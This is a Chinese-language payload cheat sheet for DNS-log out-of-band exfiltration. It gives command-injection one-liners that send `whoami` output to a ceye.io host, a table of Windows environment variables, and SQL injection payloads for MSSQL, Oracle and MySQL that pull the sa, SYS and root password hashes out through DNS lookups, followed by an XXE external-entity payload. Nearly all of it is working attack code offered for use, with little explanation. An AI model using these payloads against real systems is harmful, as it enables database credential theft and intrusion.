DNSLOG的Payload

命令执行处

linux

curl http://ip.port.b182oj.ceye.io/`whoami`
ping `whoami`.ip.port.b182oj.ceye.io

windows

ping %USERNAME%.b182oj.ceye.io

1.//变量                     类型       描述
2.//%ALLUSERSPROFILE%        本地       返回“所有用户”配置文件的位置。
3.//%APPDATA%                本地       返回默认情况下应用程序存储数据的位置。
4.//%CD%                     本地       返回当前目录字符串。
5.//%CMDCMDLINE%             本地       返回用来启动当前的 Cmd.exe 的准确命令行。
6.//%CMDEXTVERSION%          系统       返回当前的“命令处理程序扩展”的版本号。
7.//%COMPUTERNAME%           系统       返回计算机的名称。
8.//%COMSPEC%                系统       返回命令行解释器可执行程序的准确路径。
9.//%DATE%                   系统       返回当前日期。使用与 date /t 命令相同的格式。由 Cmd.exe 生成。有关 date 命令的详细信息，请参阅 Date。
10.//%ERRORLEVEL%             系统       返回上一条命令的错误代码。通常用非零值表示错误。
11.//%HOMEDRIVE%              系统       返回连接到用户主目录的本地工作站驱动器号。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。
12.//%HOMEPATH%               系统       返回用户主目录的完整路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。
13.//%HOMESHARE%              系统       返回用户的共享主目录的网络路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。
14.//%LOGONSERVER%            本地       返回验证当前登录会话的域控制器的名称。
15.//%NUMBER_OF_PROCESSORS%   系统       指定安装在计算机上的处理器的数目。
16.//%OS%                     系统       返回操作系统名称。Windows 2000 显示其操作系统为 Windows_NT。
17.//%PATH%                   系统       指定可执行文件的搜索路径。
18.//%PATHEXT%                系统       返回操作系统认为可执行的文件扩展名的列表。
19.//%PROCESSOR_ARCHITECTURE% 系统       返回处理器的芯片体系结构。值：x86 或 IA64（基于 Itanium）。
20.//%PROCESSOR_IDENTFIER%    系统       返回处理器说明。
21.//%PROCESSOR_LEVEL%        系统       返回计算机上安装的处理器的型号。
22.//%PROCESSOR_REVISION%     系统       返回处理器的版本号。
23.//%PROMPT%                 本地       返回当前解释程序的命令提示符设置。由 Cmd.exe 生成。
24.//%RANDOM%                 系统       返回 0 到 32767 之间的任意十进制数字。由 Cmd.exe 生成。
25.//%SYSTEMDRIVE%            系统       返回包含 Windows server operating system 根目录（即系统根目录）的驱动器。
26.//%SYSTEMROOT%             系统       返回 Windows server operating system 根目录的位置。
27.//%TEMP%和%TMP%            系统和用户 返回对当前登录用户可用的应用程序所使用的默认临时目录。有些应用程序需要 TEMP，而其他应用程序则需要 TMP。
28.//%TIME%                   系统       返回当前时间。使用与                                                                                   time       /t                                                                     命令相同的格式。由         Cmd.exe                  生成。有关                       time   命令的详细信息，请参阅 Time。
29.//%USERDOMAIN%             本地       返回包含用户帐户的域的名称。
30.//%USERNAME%               本地       返回当前登录的用户的名称。
31.//%USERPROFILE%            本地       返回当前用户的配置文件的位置。
32.//%WINDIR%                 系统       返回操作系统目录的位置。

注入方面

MSSQL

DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.ip.port.b182oj.ceye.io';
EXEC('master..xp_dirtree
"\\'+@host+'\foobar$"');

Oracle

SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');
SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;
SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;
SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;

Mysql

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));

XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
%remote;]>
<root/>